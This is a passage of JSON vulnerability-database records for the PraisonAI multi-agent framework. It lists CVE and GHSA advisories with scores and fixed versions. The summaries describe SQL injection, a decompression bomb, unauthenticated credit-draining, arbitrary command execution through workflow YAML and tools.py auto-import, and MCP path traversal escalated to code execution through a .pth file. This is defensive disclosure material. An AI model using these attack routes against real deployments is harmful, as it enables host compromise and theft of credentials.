sories/GHSA-9q28-ghcr-c4x3","reference_id":"GHSA-9q28-ghcr-c4x3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q28-ghcr-c4x3"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3","reference_id":"GHSA-9q28-ghcr-c4x3","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-08T23:22:13Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9q28-ghcr-c4x3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375720?format=json","purl":"pkg:pypi/praisonai@4.6.37","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.6.37"}],"aliases":["CVE-2026-44340","GHSA-9q28-ghcr-c4x3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9h3n-jwrn-q3c7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67812?format=json","vulnerability_id":"VCID-9vfs-jdzz-ckcp","summary":"PraisonAI is a multi-agent teams system. From version 2.4.1 to before version 4.6.34, PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated name and collection arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. This issue has been patched in version 4.6.34.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44337","reference_id":"","reference_type":"","scores":[{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24531","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24343","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24547","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00083","scoring_system":"epss","scoring_elements":"0.24538","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44337"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44337","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44337"},{"reference_url":"https://github.com/advisories/GHSA-3643-7v76-5cj2","reference_id":"GHSA-3643-7v76-5cj2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3643-7v76-5cj2"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2","reference_id":"GHSA-3643-7v76-5cj2","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:19:43Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3643-7v76-5cj2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375688?format=json","purl":"pkg:pypi/praisonai@4.6.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-gnv9-my7f-e7dc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.6.34"}],"aliases":["CVE-2026-44337","GHSA-3643-7v76-5cj2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9vfs-jdzz-ckcp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84244?format=json","vulnerability_id":"VCID-ayxf-uuhg-jydx","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the _safe_extractall() function in PraisonAI's recipe registry validates archive members against path traversal attacks but performs no checks on individual member sizes, cumulative extracted size, or member count before calling tar.extractall(). An attacker can publish a malicious recipe bundle containing highly compressible data (e.g., 10GB of zeros compressing to ~10MB) that exhausts the victim's disk when pulled via LocalRegistry.pull() or HttpRegistry.pull(). This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40148","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17505","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17493","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17341","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17521","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40148"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40148","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40148"},{"reference_url":"https://github.com/advisories/GHSA-f2h6-7xfr-xm8w","reference_id":"GHSA-f2h6-7xfr-xm8w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f2h6-7xfr-xm8w"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w","reference_id":"GHSA-f2h6-7xfr-xm8w","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:39:35Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-f2h6-7xfr-xm8w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40148","GHSA-f2h6-7xfr-xm8w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ayxf-uuhg-jydx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84344?format=json","vulnerability_id":"VCID-cnzy-1stv-mbgz","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits. This vulnerability is fixed in 4.5.128.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40116","reference_id":"","reference_type":"","scores":[{"value":"0.00149","scoring_system":"epss","scoring_elements":"0.3538","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00149","scoring_system":"epss","scoring_elements":"0.35384","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00149","scoring_system":"epss","scoring_elements":"0.35203","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00149","scoring_system":"epss","scoring_elements":"0.35404","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40116"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.128"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40116","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40116"},{"reference_url":"https://github.com/advisories/GHSA-q5r4-47m9-5mc7","reference_id":"GHSA-q5r4-47m9-5mc7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q5r4-47m9-5mc7"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7","reference_id":"GHSA-q5r4-47m9-5mc7","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:42:36Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373330?format=json","purl":"pkg:pypi/praisonai@4.5.128","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5bh1-sfdc-ufcv"},{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-dwef-8k3v-jfb6"},{"vulnerability":"VCID-ekcf-zxgu-8yh1"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"},{"vulnerability":"VCID-xzqd-zpz6-pbfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.128"}],"aliases":["CVE-2026-40116","GHSA-q5r4-47m9-5mc7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cnzy-1stv-mbgz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84243?format=json","vulnerability_id":"VCID-dwef-8k3v-jfb6","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the workflow engine is vulnerable to arbitrary command and code execution through untrusted YAML files. When praisonai workflow run <file.yaml> loads a YAML file with type: job, the JobWorkflowExecutor in job_workflow.py processes steps that support run: (shell commands via subprocess.run()), script: (inline Python via exec()), and python: (arbitrary Python script execution)—all without any validation, sandboxing, or user confirmation. The affected code paths include action_run() in workflow.py and _exec_shell(), _exec_inline_python(), and _exec_python_script() in job_workflow.py. An attacker who can supply or influence a workflow YAML file (particularly in CI pipelines, shared repositories, or multi-tenant deployment environments) can achieve full arbitrary command execution on the host system, compromising the machine and any accessible data or credentials. This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40288","reference_id":"","reference_type":"","scores":[{"value":"0.00141","scoring_system":"epss","scoring_elements":"0.34232","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00141","scoring_system":"epss","scoring_elements":"0.34235","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00141","scoring_system":"epss","scoring_elements":"0.34056","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00141","scoring_system":"epss","scoring_elements":"0.34256","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40288"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40288","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40288"},{"reference_url":"https://github.com/advisories/GHSA-vc46-vw85-3wvm","reference_id":"GHSA-vc46-vw85-3wvm","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vc46-vw85-3wvm"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm","reference_id":"GHSA-vc46-vw85-3wvm","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T15:56:49Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373700?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-t4qq-sgqa-ubet"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40288","GHSA-vc46-vw85-3wvm"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dwef-8k3v-jfb6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/84338?format=json","vulnerability_id":"VCID-ekcf-zxgu-8yh1","summary":"PraisonAI is a multi-agent teams system. Versions 4.5.138 and below are vulnerable to arbitrary code execution through automatic, unsanitized import of a tools.py file from the current working directory. Components including call.py (import_tools_from_file()), tool_resolver.py (_load_local_tools()), and CLI tool-loading paths blindly import ./tools.py at startup without any validation, sandboxing, or user confirmation. An attacker who can place a malicious tools.py in the directory where PraisonAI is launched (such as through a shared project, cloned repository, or writable workspace) achieves immediate arbitrary Python code execution in the host environment. This compromises the full PraisonAI process, the host system, and any connected data or credentials. This issue has been fixed in version 4.5.139.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40287","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01882","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01869","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01873","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01871","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40287"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.5.139"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40287","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40287"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc","reference_id":"GHSA-g985-wjh9-qxxc","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T13:23:23Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373700?format=json","purl":"pkg:pypi/praisonai@4.5.139","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-9vfs-jdzz-ckcp"},{"vulnerability":"VCID-fd7b-5q1f-qkh9"},{"vulnerability":"VCID-fnbr-df5j-hkay"},{"vulnerability":"VCID-gnv9-my7f-e7dc"},{"vulnerability":"VCID-nzu9-64um-47h7"},{"vulnerability":"VCID-t4qq-sgqa-ubet"},{"vulnerability":"VCID-vuwr-p2ef-w3ay"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.5.139"}],"aliases":["CVE-2026-40287","GHSA-g985-wjh9-qxxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ekcf-zxgu-8yh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67714?format=json","vulnerability_id":"VCID-fd7b-5q1f-qkh9","summary":"PraisonAI is a multi-agent teams system. Prior to version 4.6.34, PraisonAI's MCP (Model Context Protocol) server (praisonai mcp serve) registers four file-handling tools by default — praisonai.rules.create, praisonai.rules.show, praisonai.rules.delete, and praisonai.workflow.show. Each accepts a path or filename string from MCP tools/call arguments and joins it onto ~/.praison/rules/ (or, for workflow.show, accepts an absolute path) with no containment check. The JSON-RPC dispatcher passes params[\"arguments\"] blind to each handler via **kwargs without validating against the advertised input schema. By setting rule_name=\"../../<some-path>\" an attacker walks out of the rules directory and writes any file the running user can write. Dropping a Python .pth file into the user site-packages directory escalates this primitive to arbitrary code execution in any subsequent Python process the user spawns — the next praisonai CLI invocation, an IDE script run, the user's python REPL, or any background Python service. This issue has been patched in version 4.6.34.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44336","reference_id":"","reference_type":"","scores":[{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.35056","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.35034","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.34853","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00147","scoring_system":"epss","scoring_elements":"0.35032","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44336"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44336","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44336"},{"reference_url":"https://github.com/advisories/GHSA-9mqq-jqxf-grvw","reference_id":"GHSA-9mqq-jqxf-grvw","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9mqq-jqxf-grvw"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9mqq-jqxf-grvw","reference_id":"GHSA-9mqq-jqxf-grvw","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T18:32:44Z/"}],"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9mqq-jqxf-grvw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375688?format=json","purl":"pkg:pypi/praisonai@4.6.34","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9h3n-jwrn-q3c7"},{"vulnerability":"VCID-gnv9-my7f-e7dc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/praisonai@4.6.34"}],"aliases":["CVE-2026-44336","GHSA-9mqq-jqxf-grvw"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fd7b-5q1f-qkh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/80664?format=json","vulnerability_id":"VCID-fnbr-df5j-hkay","summary":"PraisonAI is a multi-agent teams system. Prior to version 4.6.9, the fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to parse_mcp_command(), allowing arbitrary executables like bash, python, or /bin/sh with inline code execution flags to pass through to subprocess execution. This issue has been patched in version 4.6.9.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41497","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29735","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29737","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29753","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29538","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41497"},{"reference_url":"https://github.com/MervinPraison/PraisonAI","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/MervinPraison/PraisonAI"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34935","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34935"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41497","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41497"},{"reference_url":"https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c","reference_id":"47bff65413beaa3c21bf633c1fae4e684348368c","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I: